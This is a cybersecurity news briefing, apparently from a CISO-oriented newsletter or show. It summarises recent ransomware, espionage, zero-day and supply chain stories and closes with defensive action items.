Good Morning Security Gang!
After taking a short pause earlier this week for Rosh Hashanah, I’m back with a strong lineup of cyber stories that highlight everything from ransomware arrests to espionage, supply chain attacks, and even a $400M fraud crackdown. Today we’re covering the arrest of a suspect in the Europe airport ransomware case, a massive telecom threat dismantled during the UN General Assembly, Jaguar Land Rover’s extended shutdown, new Chinese malware operations, casino and gaming breaches, major vendor zero-days, GitHub’s NPM security overhaul, and more.
Espresso in hand - let’s get into it.
✈ Europe Airport Ransomware Suspect Arrested
We now know more about the attack that crippled London Heathrow, Brussels International, and Berlin Brandenburg airports earlier this month. The culprit: the HardBit ransomware gang. A 40-year-old man in West Sussex has been arrested in connection, though later released on bail. Collins Aerospace, the supplier targeted, struggled to contain reinfections, highlighting the persistence of HardBit variants. While disruptive, this incident underscores how ransomware-as-a-service programs let even low-level actors create national-level disruption.
📡 UN Telecom Threat Dismantled During Assembly
As 150 world leaders gathered in Manhattan, the U.S. Secret Service uncovered and dismantled a massive hidden telecom network within 35 miles of the UN. With over 100,000 SIM cards active, the system could have crippled cell service, jammed 911 calls, or flooded networks with millions of texts per minute. Investigators believe it was nation-state backed, with the infrastructure costing millions.
As I said on the show, “It’s a new frontier of risk—attacks aimed at the invisible infrastructure that keeps cities running.”
🚗 JLR Extends Shutdown Again
Jaguar Land Rover has extended its production shutdown into next month. The company is losing £50–70M per day ($67–94M), with ripple effects across its 180,000 dependent jobs and suppliers. Shares of key partners have already dropped 55%.
“This isn’t just a cyber event—it’s an industrial shockwave crippling national economies.” James Azar
A senior UK politician described it as a “cyber shockwave” ripping through industrial heartlands. By the time operations resume, the total losses could exceed billions—making this one of the clearest case studies yet of how ransomware creates macroeconomic impact.
🐉 China’s BrickStorm and Red November Campaigns
Researchers at Google TAG and Recorded Future revealed two major Chinese espionage campaigns:
BrickStorm: Suspected Chinese hackers have been using BrickStorm malware in long-term persistence espionage operations against U.S. organizations in the tech and legal sectors. BrickStorm is a Go-based backdoor that remained undetected in victim environments for more than a year on average - with an average dwell time of 393 days before being detected. The malware serves as a web server, file manipulation tool, dropper, SOCKS relay, and shell command execution tool. The attackers used it to silently siphon data from victim networks, targeting legal and technology sector SaaS providers and business process outsourcers. Google notes that compromising such entities could help threat actors develop zero-day exploits and extend attacks to downstream victims, especially those not protected by EDR. The sophistication coming from China continues to astound, as they deploy these tools on appliances that don’t support EDR and masquerade their communications as legitimate traffic from CloudFlare or Heroku.
Red November (Storm-2077): A suspected Chinese state-sponsored threat actor called Red November (also tracked by Microsoft as Storm-2077) has been targeting perimeter appliances of high-profile organizations globally between June 2024 and July 2025. They’ve used Go-based backdoor Patanga and Cobalt Strike as part of their intrusions, hitting victims including a ministry of foreign affairs in Central Asia, a state security organization in Africa, a European government directorate, a Southeast Asian government, at least two U.S. defense contractors, a European engine manufacturer, and a trade-focused intergovernmental cooperation body in Southeast Asia. This goes directly into our patching schedules for perimeter devices - our SLAs need to keep up with threat actors, and our businesses need to adapt to the fact that threat actors are going to exploit these vulnerabilities significantly.
🎰 Boyd Gaming Breach
Las Vegas-based Boyd Gaming disclosed a breach impacting employee and limited customer data. No operations were interrupted, meaning financial fallout will likely be absorbed by cyber insurance. Still, it highlights the continued risk in hospitality and gaming sectors already targeted by groups like Scattered Spider.
🏛 CISA Warns on GeoServer Exploits
CISA reported that Chinese actors exploited a GeoServer vulnerability against federal agencies, deploying China Chopper web shells and using Dirty COW privilege escalation to persist. Despite being in the KEV catalog, exploitation began just 10 days after disclosure—proof once again that patch speed is critical.
🔐 Cisco & SolarWinds Zero-Days
Cisco IOS/IOS XE SNMP bug (CVE-2025-20352): Cisco released security updates for a high-severity zero-day vulnerability in iOS and iOS XE software that’s currently being exploited in attacks. CVE-2025-20352 is a stack-based buffer overflow in the SNMP subsystem affecting all devices with SNMP enabled. Authenticated remote attackers with low privileges can exploit it for denial of service, while high-privileged attackers can gain complete system control by executing code. This directly relates to what we discussed about China’s love for exploiting perimeter endpoints - this is exactly the type of vulnerability they target. There is a patch available, and you want to make sure to apply it ASAP.
SolarWinds Web Help Desk RCE: SolarWinds announced another hotfix for a remote code execution vulnerability in Web Help Desk - this is the third time they’ve tried to fix this issue. CVE-2025-26399 has a CVSS score of 9.8 and is described as an unauthorized AJAX proxy deserialization RCE flaw allowing command execution on the host machine. This vulnerability is a patch bypass of a previous CVE, which was itself a patch bypass of an earlier vulnerability. The original security defect was exploitable without authentication and was flagged as being exploited within days of SolarWinds releasing their first hotfix in August 2024. Hopefully third time’s a charm for our friends at SolarWinds, but this demonstrates the challenges of properly fixing complex deserialization vulnerabilities.
📦 GitHub Strengthens NPM Security
Following the Shy Hulud worm that compromised 500+ NPM packages, GitHub is rolling out stronger controls:
MFA-enforced publishing
Short-lived granular tokens
Trusted publishing via CI/CD with cryptographic trust
Automatic provenance attestations
This marks a fundamental shift toward supply chain security baked into developer workflows.
❄ EDR Freeze PoC
Researchers published EDR Freeze, showing how Windows Error Reporting APIs can suspend antivirus and EDR tools indefinitely without vulnerable drivers. While still a PoC, attackers are watching closely—CISOs need to track it.
🌍 Interpol $400M Fraud Crackdown
Interpol’s summer crackdown (Operation HAECHI) froze 68,000 bank accounts and 400 crypto wallets, recovering $439M across 40+ countries. Scams ranged from romance fraud to BEC to gambling-linked laundering. Portugal alone arrested 45 suspects tied to a syndicate. It’s proof that coordinated global law enforcement can hit criminals where it hurts—their wallets.
🧠 James Azar’s CISO Take
The stories today show that cyber has officially crossed into the realm of economic and national security. From JLR’s billions in losses to airports frozen by ransomware to telecom networks threatening to cripple Manhattan, we’re living in an era where governance, resilience, and supply chain security aren’t optional—they’re survival. If you’re a CISO, you can’t frame risk in just CVEs anymore; it’s about GDP, exports, and national stability.
The second takeaway is that China and others are targeting the edges of our systems—the devices and integrations we often overlook. At the same time, our defenses are still lagging (see GeoServer, Cisco, SolarWinds). The good news? Initiatives like GitHub’s NPM overhaul and global police crackdowns prove defenders are adapting. But the window between patch and exploit is shrinking to days. The question is whether we can keep pace.
✅ Action Items
✈ Review airport-style resiliency—manual backups matter.
🚗 Treat ransomware scenarios as macroeconomic risk—segment IT/OT.
📡 Harden telecom and IoT infrastructure against mass SIM abuse.
🐉 Prioritize edge device patching—track Chinese campaigns.
🔐 Patch Cisco IOS XE SNMP bug & SolarWinds RCE immediately.
📦 Audit CI/CD and npm publishing; adopt GitHub’s trusted workflows.
❄ Track EDR Freeze PoC and validate SOC detection rules.
🌍 Leverage global law enforcement intel from Interpol operations.
That’s it for our show this morning. We’ll be back Monday at 9 AM Eastern. This Saturday I’m dropping another article until then, have a great rest of your day, y’all, and most importantly, stay cyber safe!
